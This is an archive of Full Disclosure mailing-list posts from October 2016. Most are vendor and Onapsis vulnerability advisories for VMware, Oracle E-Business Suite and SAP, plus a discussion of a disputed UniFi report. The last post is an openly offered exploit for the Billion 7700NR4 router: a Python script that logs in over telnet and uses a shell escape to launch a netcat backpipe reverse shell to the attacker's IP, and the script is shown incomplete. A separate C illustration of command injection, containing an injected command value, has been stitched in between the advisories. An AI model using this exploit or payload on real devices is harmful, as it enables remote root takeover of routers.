[FD] NEW VMSA-2016-0016 - vRealize Operations (vROps) updates address privilege escalation vulnerability

2016-10-11 Thread VMware Security Response Center
   VMware Security Advisory
 
Advisory ID: VMSA-2016-0016
Severity:    Critical
Synopsis:    vRealize Operations (vROps) updates address privilege
             escalation vulnerability
Issue date:  2016-10-11
Updated on:  2016-10-11 (Initial Advisory)
CVE number:  CVE-2016-7457
 
1. Summary
 
   vRealize Operations (vROps) updates address privilege escalation
   vulnerability.
 
2. Relevant Products
 
   vRealize Operations (vROps)
 
3. Problem Description
 
   vROps privilege escalation issue
 
   vROps contains a privilege escalation vulnerability. Exploitation of
   this issue may allow a vROps user who has been assigned a low-privileged
   role to gain full access over the application. In addition it may be
   possible to stop and delete Virtual Machines managed by vCenter.
 
   VMware would like to thank Edgar Carvalho for reporting this issue to
   us.
 
   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the identifier CVE-2016-7457 to this issue.
 
   Column 5 of the following table lists the action required to remediate
   the vulnerability in each release, if a solution is available.
 
   VMware      Product  Running  Severity  Replace with/    Workaround
   Product     Version  on                 Apply Patch
   ==========  =======  =======  ========  ===============  ==========
   vRealize    6.3.0    Any      Critical  patch pending    KB2147215
   Operations
   vRealize    6.2.1    Any      Critical  patch pending    KB2147247
   Operations
   vRealize    6.2.0a   Any      Critical  patch pending    KB2147246
   Operations
   vRealize    6.1.0    Any      Critical  patch pending    KB2147248
   Operations
   vRealize    6.0.x    Any      N/A       not affected     N/A
   Operations
   vRealize    5.x      Any      N/A       not affected     N/A
   Operations
 
4. Solution
 
   Please review the patch/release notes for your product and version and
   verify the checksum of your downloaded file.
 
   vRealize Operations
   Downloads and Documentation:
  
   https://my.vmware.com/en/web/vmware/info/slug/infrastructure_operations_management/vmware_vrealize_operations/6_3
 
5. References
 
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7457
   https://kb.vmware.com/kb/2147215
   https://kb.vmware.com/kb/2147247
   https://kb.vmware.com/kb/2147246
   https://kb.vmware.com/kb/2147248
 
 
6. Change log
 
   2016-10-11 VMSA-2016-0016 Initial security advisory in conjunction with
   the release of vROps patches on 2016-10-11.
 
 
7. Contact
 
   E-mail list for product security notifications and announcements:
   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
 
   This Security Advisory is posted to the following lists:
 
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
 
   E-mail: security at vmware.com
   PGP key at: https://kb.vmware.com/kb/1055
 
   VMware Security Advisories
   http://www.vmware.com/security/advisories
 
   VMware Security Response Policy
   https://www.vmware.com/support/policies/security_response.html
 
   VMware Lifecycle Support Phases
   https://www.vmware.com/support/policies/lifecycle.html
   Twitter
   https://twitter.com/VMwareSRC
 
   Copyright 2016 VMware Inc.  All rights reserved.



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Onapsis Security Advisory ONAPSIS-2016-057: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-057: Oracle E-Business Suite Cross Site 
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive 
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-057
- Onapsis SVS ID: ONAPSIS-00260
- CVE: CVE-2016-0533
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page 
Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vi-0

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the 
web listener and the data server. 

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute 
arbitrary code. This file has a parameter which is neither validated nor 
encoded.

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016. 

7. Report Timeline
==
- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the 
vulnerability.
- 09/22/2016: Onapsis releases security advisory.


About Onapsis Research Labs
===
Onapsis Research Labs provides the industry analysis of key security issues 
that impact business-critical systems and applications. Delivering frequent and 
timely security and compliance advisories with associated risk levels, Onapsis 
Research Labs combine in-depth knowledge and experience to deliver technical 
and business-context with sound security judgment to the broader information 
security community.

About Onapsis, Inc.
===
Onapsis provides the most comprehensive solutions for securing SAP and Oracle 
enterprise applications. As the leading experts in SAP and Oracle 
cyber-security, Onapsis enables security and audit teams to have visibility, 
confidence and control of advanced threats, cyber-risks and compliance gaps 
affecting their enterprise applications.

Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, 
including 10 top retailers, 20 top energy firms and 20 top manufacturers. 
Onapsis’ solutions are also the de-facto standard for leading consulting and 
audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC.

Onapsis solutions include the Onapsis Security Platform, which is the most 
widely-used SAP-certified cyber-security solution in the market. Unlike generic 
security products, Onapsis’ context-aware solutions deliver both preventative 
vulnerability and compliance controls, as well as real-time detection and 
incident response capabilities to reduce risks affecting critical business 
processes and data. Through open interfaces, the platform can be integrated 
with leading SIEM, GRC and network security products, seamlessly incorporating 
enterprise applications into existing vulnerability, risk and incident response 
management programs.

These solutions are powered by the Onapsis Research Labs which continuously 
provide leading intelligence on security threats affecting SAP and Oracle 
enterprise applications. Experts of the Onapsis Research Labs were the first to 
lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of 
security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP 
Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle 
E-Business Suite platforms.

For more information, please visit www.onapsis.com, or connect with us on 
Twitter, Google+, or LinkedIn.




[FD] Onapsis Security Advisory ONAPSIS-2016-056: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-056: Oracle E-Business Suite Cross Site 
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive 
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-056
- Onapsis SVS ID: ONAPSIS-00269, ONAPSIS-00270, ONAPSIS-00271, ONAPSIS-00272, 
ONAPSIS-00273, ONAPSIS-00274 and ONAPSIS-00275
- CVE: CVE-2016-3532
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page 
Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-v

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the 
web listener and the data server. 

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute 
arbitrary code. This file has seven parameters which are neither validated 
nor encoded. 

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016. 

7. Report Timeline
==
- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the 
vulnerability.
- 09/22/2016: Onapsis releases security advisory.



[FD] Onapsis Security Advisory ONAPSIS-2016-055: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-055: Oracle E-Business Suite Cross Site 
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive 
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-055
- Onapsis SVS ID: ONAPSIS-00277, ONAPSIS-00278 and ONAPSIS-00279
- CVE: CVE-2016-3533
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page 
Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-iv

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the 
web listener and the data server. 

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute 
arbitrary code. This file has three parameters which are neither validated 
nor encoded. 

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016. 

7. Report Timeline
==
- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the 
vulnerability.
- 09/22/2016: Onapsis releases security advisory.



[FD] Onapsis Security Advisory ONAPSIS-2016-053: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-053: Oracle E-Business Suite Cross Site 
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive 
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-053
- Onapsis SVS ID: ONAPSIS-00281
- CVE: CVE-2016-3535
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page 
Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vii

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the 
web listener and the data server. 

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute 
arbitrary code. This file has a parameter which is neither validated nor 
encoded. 

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016. 

7. Report Timeline
==
- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the 
vulnerability.
- 09/22/2016: Onapsis releases security advisory.



[FD] Onapsis Security Advisory ONAPSIS-2016-052: Oracle E-Business Suite Cross Site Scripting (XSS)

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-052: Oracle E-Business Suite Cross Site 
Scripting (XSS)

1. Impact on Business
=
By exploiting this vulnerability, a remote attacker could steal sensitive 
business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-052
- Onapsis SVS ID: ONAPSIS-00282 and ONAPSIS-00283
- CVE: CVE-2016-3536
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page 
Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vi

4. Affected Components Description
==
Oracle E-Business Suite has more than 8000 JSP files which interact with the 
web listener and the data server. 

5. Vulnerability Details

A remote unauthenticated attacker could use a specific JSP file to execute 
arbitrary code. This file has two parameters which are neither validated 
nor encoded. 

6. Solution
===
Implement Oracle Critical Patch Update released in July 2016. 

7. Report Timeline
==
- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the 
vulnerability.
- 09/22/2016: Onapsis releases security advisory.



[FD] Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory 
Corruption

1. Impact on Business
=
By exploiting this vulnerability an attacker could hide audit information 
logged by the SAP system.

Risk Level: Low

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-051
- Onapsis SVS ID: ONAPSIS-00247
- CVE: CVE-2016-7437
- Researcher: Emiliano J. Fausto
- Vendor Provided CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)
- Onapsis CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)

3. Vulnerability Information

- Vendor: SAP AG
- Affected Components: SAP NETWEAVER 7.40
- Vulnerability Class: Insufficient Logging (CWE-778)
- Remotely Exploitable: No
- Locally Exploitable: Yes
- Authentication Required: Yes
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0

4. Affected Components Description
==
The SAP Security Audit Log is used to record security-related system 
information such as changes to user master records or unsuccessful logon 
attempts. This log is a tool designed for auditors who need to take a detailed 
look at what occurs in the SAP System. By activating the audit log, you keep a 
record of those activities that you specify for your audit. You can then access 
this information for evaluation in the form of an audit analysis report.

5. Vulnerability Details

Even when configuring the parameter rfc/callback_security_method and the SAP 
Security Audit Log to consider RFC callback events (Accepted/Rejected), both 
events DUI/DUJ will be logged in the SAP Security Audit Log as Non-critical.
As the information provided by the SAP Security Audit Log to the security 
expert is inaccurate, filtering out non-critical events will also filter 
rejected attempts to execute RFC function callbacks.

6. Solution
===
Implement SAP Security Note 2252312.

7. Report Timeline
==
- 11/24/2015: Onapsis provides vulnerability information to SAP AG.
- 01/09/2016: SAP releases SAP Security Note 2252312 fixing the vulnerability.
- 09/22/2016: Onapsis releases security advisory.



[FD] Onapsis Security Advisory ONAPSIS-2016-005: SAP SLDREG memory corruption

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-005: SAP SLDREG memory corruption

1. Impact on Business
=
By exploiting this vulnerability, an attacker could potentially abuse 
technical functions to access and/or compromise the business information.

Risk Level: Low

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-005
- Onapsis SVS ID: ONAPSIS-00161
- CVE: CVE-2016-3638
- Researcher: Nahuel D. Sanchez
- Vendor Provided CVSS v2: 1.5 (AV:L/AC:M/Au:S/C:N/I:N/A:P)
- Onapsis CVSS v2: 2.1 (AV:L/AC:L/Au:N/C:N/I:N/A:P)

3. Vulnerability Information

- Vendor: SAP AG
- Affected Components: SLD Registration Program
- Vulnerability Class: Buffer errors (CWE-119)
- Remotely Exploitable: No
- Locally Exploitable: Yes
- Authentication Required: No
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/sap-sldreg-memory-corruption

4. Affected Components Description
==
The SLDREG tool is used to register SAP Systems in the System Landscape 
Directory. The System Landscape Directory of SAP NetWeaver (SLD) serves as a 
central information repository for the system landscape. 

5. Vulnerability Details

The SLDREG binary is prone to a memory corruption vulnerability, when a 
specially crafted input is passed as HOST parameter.

6. Solution
===
Implement SAP Security Note 2125623.

7. Report Timeline
==
- 01/30/2015: Onapsis provides vulnerability information to SAP AG.
- 02/02/2015: SAP AG confirms reception of vulnerability report.
- 03/10/2015: SAP Reported that the vulnerability is not a security issue
- 04/14/2015: SAP reported fix is In Process.
- 05/12/2015: SAP reported fix is In Process.
- 06/09/2015: SAP reported fix is In Process.
- 07/14/2015: SAP reported fix is In Process.
- 08/11/2015: SAP released SAP Security Note 2125623 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.



[FD] Onapsis Security Advisory ONAPSIS-2016-050: SAP OS Command Injection in SCTC_REFRESH_CONFIG_CTC

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-050: SAP OS Command Injection in 
SCTC_REFRESH_CONFIG_CTC

1. Impact on Business
=
By exploiting this vulnerability an authenticated user will be able to take 
full control of the system.

Risk Level: Critical

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-050
- Onapsis SVS ID: ONAPSIS-00252
- CVE: CVE-2016-7435
- Researcher: Pablo Artuso
- Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H)
- Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

3. Vulnerability Information

- Vendor: SAP AG
- Affected Components: SAP Netweaver 7.40 SP 12
- Vulnerability Class: Improper Neutralization of Special Elements used in an 
OS Command (CWE-78)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshconfigctc

4. Affected Components Description
==
SAP NetWeaver is the SAP technological integration platform, on top of which, 
enterprise and business solutions are developed and run.
In particular, SCTC is a subpackage of SAP_BASIS which holds technical 
configurations.


5. Vulnerability Details

The SCTC_REFRESH_CONFIG_CTC function doesn't correctly sanitize variables used 
when executing a CALL 'SYSTEM' statement, allowing an attacker with particular 
privileges to execute arbitrary OS commands. 

6. Solution
===
Implement SAP Security Note 2260344.

7. Report Timeline
==
- 11/26/2015: Onapsis provides vulnerability information to SAP AG.
- 11/27/2015: SAP AG confirms reception of vulnerability report.
- 01/12/2016: SAP reports fix is In Process.
- 03/08/2016: SAP releases SAP Security Note 2260344 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.



[FD] Onapsis Security Advisory ONAPSIS-2016-049: SAP OS Command Injection in SCTC_REORG_SPOOL

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-049: SAP OS Command Injection in 
SCTC_REORG_SPOOL

1. Impact on Business
=
By exploiting this vulnerability an authenticated user will be able to take 
full control of the system.

Risk Level: Critical

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-049
- Onapsis SVS ID: ONAPSIS-00255
- CVE: CVE-2016-7435
- Researcher: Pablo Artuso
- Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H)
- Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

3. Vulnerability Information

- Vendor: SAP AG
- Affected Components: SAP Netweaver 7.40 SP 12
- Vulnerability Class: Improper Neutralization of Special Elements used in an 
OS Command (CWE-78)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcreorgspool

4. Affected Components Description
==
SAP NetWeaver is the SAP technological integration platform, on top of which, 
enterprise and business solutions are developed and run.
In particular, SCTC is a subpackage of SAP_BASIS which holds technical 
configurations.


5. Vulnerability Details

The SCTC_REORG_SPOOL function doesn't correctly sanitize variables used when 
executing a CALL 'SYSTEM' statement, allowing an attacker with particular 
privileges to execute arbitrary OS commands. 

6. Solution
===
Implement SAP Security Note 2260344.

7. Report Timeline
==
- 11/26/2015: Onapsis provides vulnerability information to SAP AG.
- 11/27/2015: SAP AG confirms reception of vulnerability report.
- 01/12/2016: SAP reports fix is In Process.
- 03/08/2016: SAP releases SAP Security Note 2260344 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.


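Both ONAPSIS-2016-049 and ONAPSIS-2016-050 above describe the same bug class, CWE-78, without showing the affected ABAP, and ABAP cannot be run here. The following is an added C illustration of that class and is not Onapsis's or SAP's code: CALL 'SYSTEM' hands a string to the OS shell much as system() does in C, so any caller-controlled field concatenated into that string is shell syntax. Which SCTC variable is injectable is not stated in the advisories; the spool directory, the rm command and the "client is exactly three digits" allow-list are assumptions for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Vulnerable pattern: a caller-controlled field is pasted into a command
 * string that is then handed to the OS shell (CALL 'SYSTEM' in ABAP plays
 * the role of system() in C).  Returns the length written, -1 on truncation. */
int build_reorg_cmd_vuln(const char *spool_dir, const char *client,
                         char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "rm -f %s/SPOOL_%s_*", spool_dir, client);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Hardened: validate the field against a strict allow-list before it can
 * reach the command string.  An SAP client is exactly three digits
 * (assumption for the example); anything else is rejected outright. */
int is_valid_client(const char *client)
{
    size_t i;
    if (strlen(client) != 3)
        return 0;
    for (i = 0; i < 3; i++)
        if (!isdigit((unsigned char)client[i]))
            return 0;
    return 1;
}

int build_reorg_cmd_safe(const char *spool_dir, const char *client,
                         char *out, size_t outlen)
{
    if (!is_valid_client(client))
        return -1;
    return build_reorg_cmd_vuln(spool_dir, client, out, outlen);
}

/* Helper for the demonstration only: does the finished command carry a
 * shell metacharacter?  A deny-list like this is NOT the fix; the
 * allow-list above is. */
int contains_shell_meta(const char *cmd)
{
    return strpbrk(cmd, ";|&`$\n<>") != NULL;
}

int main(void)
{
    char cmd[256];
    const char *dir = "/usr/sap/trans/spool";        /* assumed path */
    const char *evil = "100;id>/tmp/pwned";           /* injected field */

    if (build_reorg_cmd_vuln(dir, evil, cmd, sizeof cmd) > 0)
        printf("vulnerable builder: %s  (shell meta: %d)\n",
               cmd, contains_shell_meta(cmd));
    printf("hardened builder, injected field: rc=%d\n",
           build_reorg_cmd_safe(dir, evil, cmd, sizeof cmd));
    if (build_reorg_cmd_safe(dir, "100", cmd, sizeof cmd) > 0)
        printf("hardened builder, client 100: %s\n", cmd);
    return 0;
}
```

The vulnerable builder happily emits `rm -f /usr/sap/trans/spool/SPOOL_100;id>/tmp/pwned_*`, which a shell runs as two commands; the hardened builder never lets the field through unless it matches the allow-list, which is the check SAP Security Note 2260344 effectively restores for the SCTC functions.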

[FD] Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass

2016-10-11 Thread Onapsis Research
Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass

1. Impact on Business
=
By exploiting this vulnerability, an attacker could bypass protections 
implemented in the SAP systems, potentially executing arbitrary business 
processes.

Risk Level: Medium

2. Advisory Information
===
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-002
- Onapsis SVS ID: ONAPSIS-00165
- CVE: CVE-2016-3635
- Researcher: Sergio Abraham and Pablo Müller
- Vendor Provided CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
- Onapsis CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)

3. Vulnerability Information

- Vendor: SAP AG
- Affected Components: SAP Netweaver 7.4
- Vulnerability Class: Improper Access Control (CWE-284)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: 
https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass

4. Affected Components Description
==
In SAP, the Remote Function Modules (RFM) are used to execute remote functions 
in external systems, where the access control can be enforced by a list that is 
managed through the Unified Connectivity (UCON) framework.

5. Vulnerability Details

An authenticated user could execute Remote Function Modules (RFM) which are 
filtered by the Unified Connectivity (UCON) access control list. Those RFMs are 
in the final phase of UCON implementation and not included in a Communication 
Assembly (CA). That means that no user (regardless of its privileges) should be 
able to execute those RFMs.

The user needs to remotely execute an anonymous RFM included in a Communication 
Assembly (enabled by UCON), and by leveraging the same connection execute a 
second RFM which is filtered (not included in a Communication Assembly).
As a result, the user will be able to execute an RFM that was originally filtered 
by UCON, completely bypassing the access control list.

6. Solution
===
Implement SAP Security Note 2139366. 

7. Report Timeline
==
- 03/03/2015: Onapsis provides vulnerability information to SAP AG.
- 03/05/2015: SAP AG confirms reception of vulnerability report.
- 03/10/2015: SAP reported fix is In Process.
- 04/14/2015: SAP reported fix is In Process.
- 05/12/2015: SAP reported fix is In Process.
- 06/09/2015: SAP reported fix is In Process.
- 06/09/2015: SAP released SAP Security Note 2139366 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.




Re: [FD] Critical Vulnerability in Ubiquiti UniFi

2016-10-11 Thread Rob Thomas
The impression I get from Tim Pham's emails is that the 'Unify Manager' is 
doing some behind-the-scenes tunnelling, and bringing the Mongo interface from 
the server to the client (e.g., Mac or Windows device) and you are then able to 
connect to localhost (on the client) which tunnels through to the server.

However, after much searching, I am unable to locate this application. Googling 
insinuates that it is this (unreleased) software - 
https://www.ubnt.com/enterprise/software/

--Rob Thomas
Information Security, Sangoma Corporation


-Original Message-
From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of 
Gregory Sloop
Sent: Wednesday, 5 October 2016 1:54 AM
To: Tim Schughart ; 
fulldisclosure@seclists.org; bugt...@securityfocus.com; 
webapp...@securityfocus.com
Cc: Khanh Quoc. Pham 
Subject: Re: [FD] Critical Vulnerability in Ubiquiti UniFi

I attempted private contact with Tim Pham and via email 12+ hours ago, but 
received no response since then.

I've spent some time trying to reproduce the reported vulnerability and have 
had no success. It certainly doesn't help that the steps to reproduce it are so 
poorly described or documented.
Without better documentation of the exploit, it seems impossible to determine 
if the report is just mis-informed, blatantly false, or if perhaps there's some 
step/process I don't understand or am missing.

In every attempt I've made the binding of MongoDB to 127.0.0.1 is effective and 
non-local connection attempts are refused, as one would expect.
A swift response from Prosec Networks [prosec-networks.com] would be most 
helpful.

___
Sent through the Full Disclosure mailing list 
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/



[FD] Billion Router 7700NR4 Remote Root Command Execution

2016-10-11 Thread Rio Sherri
# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is widely used here in Albania. It is given by a telecom
# provider to home and business users.
# The problem is that this router has hardcoded credentials which "can not
# be changed" by a normal user. Using these credentials we don't have much
# access, but due to the lack of authentication security we can download the
# backup and get the admin password.
# Using that password we can login to the telnet server and use a shell escape
# to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the
# credentials and disabling all the other services using iptables.
# Exploit attached.

import base64
import socket
import sys
import time

import requests

host = ""           # target router
def_user = "user"   # hardcoded low-privilege account that cannot be changed
def_pass = "user"
reverse_ip = ""     # attacker IP that will catch the reverse shell

if not host or not reverse_ip:
    sys.exit("[-] Set host and reverse_ip first [-]")

# Banner
banner = ""
banner +="  _____ __  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print(banner)


# Limited shell escape: the restricted telnet shell's "ping" command is abused
# to run a chained shell line that writes a netcat backpipe reverse shell
# script to /tmp and runs it in the background (/bin/sh assumed for busybox).
evil = ('ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip
        + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;'
        'chmod +x rev.sh;sh /tmp/rev.sh &')


def execute_payload(password):
    """Log in to the router's telnet service as admin and fire the escape."""
    print("[+] Please run nc -lvp 1337 and then press any key [+]")
    input()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 23))
    s.recv(1024)                           # login banner / username prompt
    s.send(b"admin\r")
    s.recv(1024)                           # password prompt
    time.sleep(1)
    s.send((password + "\r").encode())
    time.sleep(1)
    s.recv(1024)                           # restricted shell prompt
    s.send((evil + "\r").encode())
    time.sleep(1)
    print("[+] If everything worked you should get a reverse shell [+]")
    print("[+] Warning pressing any key will close the SHELL [+]")
    input()
    s.close()


